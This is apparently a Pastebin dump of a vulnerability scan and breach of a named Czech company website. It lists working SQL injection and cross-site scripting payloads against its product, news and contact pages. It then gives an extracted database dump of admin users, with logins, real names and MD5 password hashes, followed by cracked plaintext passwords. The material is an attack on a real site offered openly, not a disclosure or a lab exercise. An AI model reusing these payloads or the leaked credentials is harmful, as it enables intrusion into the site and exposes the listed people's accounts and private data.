Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ||| SQL Injection
- Severity: Critical
- Confirmation: Confirmed
- URL: http://cieb.cz/p.php?p=produkt&id=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))&produkt_id=30
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- Severity: Critical
- Confirmation: Confirmed
- URL: http://cieb.cz/p.php?p=produkt&id=49&produkt_id=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: produkt_id
- Parameter Type: Querystring
- Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- ||| Boolean Based SQL Injection
- Severity: Critical
- Confirmation: Confirmed
- URL: http://cieb.cz/p.php?p=aktuality&id=-1 OR 17-7=10
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- Severity: Critical
- Confirmation: Confirmed
- URL: http://cieb.cz/p.php?p=produkt&id=-1 OR 17-7=10&produkt_id=30
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- Severity: Critical
- Confirmation: Confirmed
- URL: http://cieb.cz/p.php?p=produkt&id=49&produkt_id=-1 OR 17-7=10
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: produkt_id
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- ||| [High Possibility] SQL Injection
- Severity: Critical
- Confirmation: Confirmed
- URL: http://cieb.cz/p.php?p=aktuality&id=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity: Critical
- Confirmation: Confirmed
- URL: http://cieb.cz/p.php?p=produkt&id=-1 OR 17-7=10&produkt_id=30
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- Severity: Critical
- Confirmation: Confirmed
- URL: http://cieb.cz/p.php?p=produkt&id=49&produkt_id=-1 OR 17-7=10
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: produkt_id
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- ||| [High Possibility] SQL Injection
- Severity: Critical
- Confirmation: Confirmed
- URL: http://cieb.cz/p.php?p=aktuality&id=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity: Critical
- Confirmation: Confirmed
- URL: http://cieb.cz/p.php?p=produkt&id=%27&produkt_id=30
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity: Critical
- Confirmation: Confirmed
- URL: http://cieb.cz/p.php?p=produkt&id=49&produkt_id=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: produkt_id
- Parameter Type: Querystring
- Attack Pattern: %27
- ||| XSS (Cross-site Scripting)
- Severity: Important
- Confirmation: Confirmed
- URL: http://cieb.cz/p.php?p=produkt&id='"--></style></script><script>alert(0x0000AD)</script>&produkt_id=30
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0000AD)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://cieb.cz/p.php?p=produkt&id=49&produkt_id='"--></style></script><script>alert(0x0000B7)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: produkt_id
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0000B7)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://cieb.cz/p.php?p=aktuality&id='"--></style></script><script>alert(0x0000C2)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0000C2)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://cieb.cz/phpinfo.php?'"--></style></script><script>alert(0x0000DD)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: '"--></style></script><script>alert(0x0000DD)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://cieb.cz/p.php?p=latky&id_latky=4&obr='"--></style></script><script>alert(0x000117)</script>&popis=Tria
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: obr
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000117)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://cieb.cz/p.php?p=latky&id_latky=4&obr=ref_48.jpg&popis='"--></style></script><script>alert(0x000119)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: popis
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000119)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://cieb.cz/p.php?p=formular&chyba=1&titul=&jmeno=3&prijmeni=3&firma=3&adresa=\0\'\"--></style></script><script>netsparker(0x00011B)</script>&mesto=3&zeme=&tel=3&email=netsparker@example.com&fax=3&text=3
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: adresa
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00011B)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://cieb.cz/p.php?p=formular&chyba=1&titul=&jmeno=3&prijmeni=3&firma=3&adresa=3&mesto=3&zeme=&tel=3&email=\'\"--></style></script><script>netsparker(0x00011C)</script>&fax=3&text=3
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: email
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00011C)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://cieb.cz/p.php?p=formular&chyba=1&titul=&jmeno=3&prijmeni=3&firma=3&adresa=3&mesto=3&zeme=&tel=3&email=netsparker@example.com&fax=\'\"--></style></script><script>netsparker(0x00011D)</script>&text=3
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: fax
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00011D)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://cieb.cz/p.php?p=formular&chyba=1&titul=&jmeno=3&prijmeni=3&firma=\'\"--></style></script><script>netsparker(0x00011E)</script>&adresa=3&mesto=3&zeme=&tel=3&email=netsparker@example.com&fax=3&text=3
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: firma
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00011E)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://cieb.cz/p.php?p=formular&chyba=1&titul=&jmeno=\'\"--></style></script><script>netsparker(0x00011F)</script>&prijmeni=3&firma=3&adresa=3&mesto=3&zeme=&tel=3&email=netsparker@example.com&fax=3&text=3
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: jmeno
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00011F)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://cieb.cz/p.php?p=formular&chyba=1&titul=&jmeno=3&prijmeni=3&firma=3&adresa=3&mesto=\0\'\"--></style></script><script>netsparker(0x00012C)</script>&zeme=&tel=3&email=netsparker@example.com&fax=3&text=3
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: mesto
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00012C)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://cieb.cz/p.php?p=formular&chyba=1&titul=&jmeno=3&prijmeni=\0\'\"--></style></script><script>netsparker(0x00012F)</script>&firma=3&adresa=3&mesto=3&zeme=Czech Republic&tel=3&email=netsparker@example.com&fax=3&text=3
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: prijmeni
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00012F)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://cieb.cz/p.php?p=formular&chyba=1&titul=&jmeno=3&prijmeni=3&firma=3&adresa=3&mesto=3&zeme=&tel=\'\"--></style></script><script>netsparker(0x000140)</script>&email=netsparker@example.com&fax=3&text=3
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: tel
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000140)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://cieb.cz/p.php?p=formular&chyba=1&titul=&jmeno=3&prijmeni=3&firma=3&adresa=3&mesto=3&zeme=&tel=3&email=netsparker@example.com&fax=3&text=\'\"--></style></script><script>netsparker(0x000142)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: text
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000142)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://cieb.cz/admin/loginf.php?auth_res=1
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: auth_usr
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000425)</script>
- ||| [Possible] Cross-site Scripting
- Severity: Medium
- Confirmation: Confirmed
- URL: http://cieb.cz/admin/user_zadej.php?id=-1'"--></style></script><script>alert(0x000256)</script>&PHPSESSID=8cb3dde1f4b5b997ee85181bd3fe4737
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Notes: This page responses with HTTP redirect status therefore detected XSS vulnerability might not be exploitable
- in many conditions however it still indicates lack of correct filtering and should be addressed.
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: -1'"--></style></script><script>netsparker(0x000256)</script>
- ||| phpinfo() Information Disclosure
- Severity: Low
- Confirmation: Confirmed
- URL: http://cieb.cz/phpinfo.php
- Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
- ||| MySQL Database Identified
- Severity : Information
- Confirmation: Confirmed
- URL: http://cieb.cz/p.php?p=produkt&id=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))&produkt_id=30
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- ||| E-mail Address Disclosure
- Severity : Information
- Confirmation: Confirmed
- URL: http://cieb.cz/
- Found E-mails:
- cieb@cieb.cz
- ott@sherwoodmedia.cz
- noreply@sherwood.cz
- ||| [Possible] Internal Path Leakage (*nix)
- Severity : Information
- Confirmation: Confirmed
- URL: http://cieb.cz/phpinfo.php
- Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
- Identified Internal Path(s):
- /etc/php4/apache2/php.ini
- /etc/php4/apache2/conf.d
- /etc/php4/apache2/conf.d/curl.ini,
- /etc/php4/apache2/conf.d/domxml.ini,
- /etc/php4/apache2/conf.d/gd.ini,
- /etc/php4/apache2/conf.d/imap.ini,
- /etc/php4/apache2/conf.d/ldap.ini,
- /etc/php4/apache2/conf.d/mcal.ini,
- /etc/php4/apache2/conf.d/mcrypt.ini,
- /etc/php4/apache2/conf.d/mysql.ini,
- /etc/php4/apache2/conf.d/xslt.ini
- /home/unreal_e
- /usr/lib/php4/20050606+lfs
- /usr/share/php:/usr/share/pear
- /home/unreal_e:/tmp
- /usr/sbin/sendmail -t -i -f noreply@sherwood.cz -F Apache
- /usr/sbin/sendmail -t -i
- /etc/apache2
- /usr/local/bin:/usr/bin:/bin
- /home/unreal_e/cieb.cz
- /home/unreal_e/cieb.cz/admin/stranky.php
- /home/unreal_e/cieb.cz/admin/index2.php
- /home/unreal_e/cieb.cz/admin/nastenka.php
- /home/unreal_e/cieb.cz/admin/header.inc.php
- /home/unreal_e/cieb.cz/admin/poznamka.php
- /home/unreal_e/cieb.cz/admin/user_uloz.php
- ||| Login Page - URL: http://cieb.cz/admin/
- ||| Info DB
- Target: http://cieb.cz/p.php?p=aktuality&id=-1+OR+17-7%3d10
- Web Server: Apache
- Powered-by: PHP/4.4.4-8+etch6
- DB Server: MySQL
- Resp. Time(avg): 972 ms
- Current User: cieb_cz@localhost
- Sql Version: 5.0.32-Debian_7etch12
- Current DB: cieb_cz
- System User: cieb_cz@localhost
- Installation dir: /usr/
- DB User: 'cieb_cz'@'localhost'
- Data Bases: information_schema, cieb_cz
- Count(table_name) of information_schema.tables where table_schema=0x636965625F637A is 29
- cieb_cz tables:
- aktuality
- inzerce
- jazyky
- latky
- latky_jaz
- latky_popis
- level1,level2
- level3,level4
- nastenka
- pageviews
- plugin
- poznamka
- pravaObsah
- pravaSkup
- pravaplugin
- produkt_detail
- produkt_tab
- produkt_tech
- produkty
- produkty_jaz
- ref_obrazky
- skupiny
- staty
- uvodni_strana
- uzivatele
- volna_mista
- zakl_udaje
- Count(column_name) of information_schema.columns where table_schema=0x636965625F637A and table_name=0x757A69766174656C65 is 7
- Columns found:
- iduzivatele
- login
- heslo
- prava
- idpravaSkup
- jmeno
- last
- Count(*) of cieb_cz.uzivatele is 11
- heslo=04284f9437884d3a2c3cb21b349dab65
- login=zatloukal
- prava=5
- idpravaSkup=0
- jmeno=Radek Zatloukal
- heslo=12c4f5959c9e021879ca222dc6c8e6e6
- login=cieb
- prava=5
- idpravaSkup=0
- jmeno=cieb
- heslo=5a7f0d68e34769bdd1f1e4dd2e7237c6
- login=alexa
- prava=5
- idpravaSkup=0
- jmeno=alexa
- heslo=73fe9e718740d6ad2f50939ee53648c5
- login=kalava
- prava=100
- idpravaSkup=0
- jmeno=kalava
- heslo=87d0e6f717230e033c43ecdee9db42e5
- login=chmela
- prava=0
- idpravaSkup=0
- jmeno=chmela
- heslo=8f0a7fe57cf00e74a1721c5851958c0a
- login=viki
- prava=100
- idpravaSkup=0
- jmeno=Viki
- heslo=955db0b81ef1989b4a4dfeae8061a9a6
- login=ml
- prava=5
- idpravaSkup=0
- jmeno=ml
- heslo=acd28ac6fae46545ffe8950ca559ed58
- login=navy
- prava=100
- idpravaSkup=0
- jmeno=Navy
- heslo=c1bed8b1918ccdb44d150653e96b4942
- login=brett
- prava=5
- idpravaSkup=0
- jmeno=brett
- heslo=cc9d829d3c4ac1f7e01bb85727113d95
- login=hat
- prava=100
- idpravaSkup=0
- jmeno=HaT
- heslo=ff352b010b06e1afe820cef314865ee1
- login=tomes
- prava=5
- idpravaSkup=0
- ||| Decrypt md5 hash :)
- 8f0a7fe57cf00e74a1721c5851958c0a:xvikto:7876696b746f
- 5a7f0d68e34769bdd1f1e4dd2e7237c6:tabak:746162616b
- 955db0b81ef1989b4a4dfeae8061a9a6:heslo:6865736c6f
- c1bed8b1918ccdb44d150653e96b4942:brett:6272657474
- acd28ac6fae46545ffe8950ca559ed58:noentry:6e6f656e747279
- 73fe9e718740d6ad2f50939ee53648c5:kaktus:6b616b747573
- cc9d829d3c4ac1f7e01bb85727113d95:zkusto:7a6b7573746f
- 87d0e6f717230e033c43ecdee9db42e5:realpark:7265616c7061726b
- 12c4f5959c9e021879ca222dc6c8e6e6:cie1994b:6369653139393462
- ff352b010b06e1afe820cef314865ee1:tomes794:746f6d6573373934
- 04284f9437884d3a2c3cb21b349dab65 - ????????????????????????
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement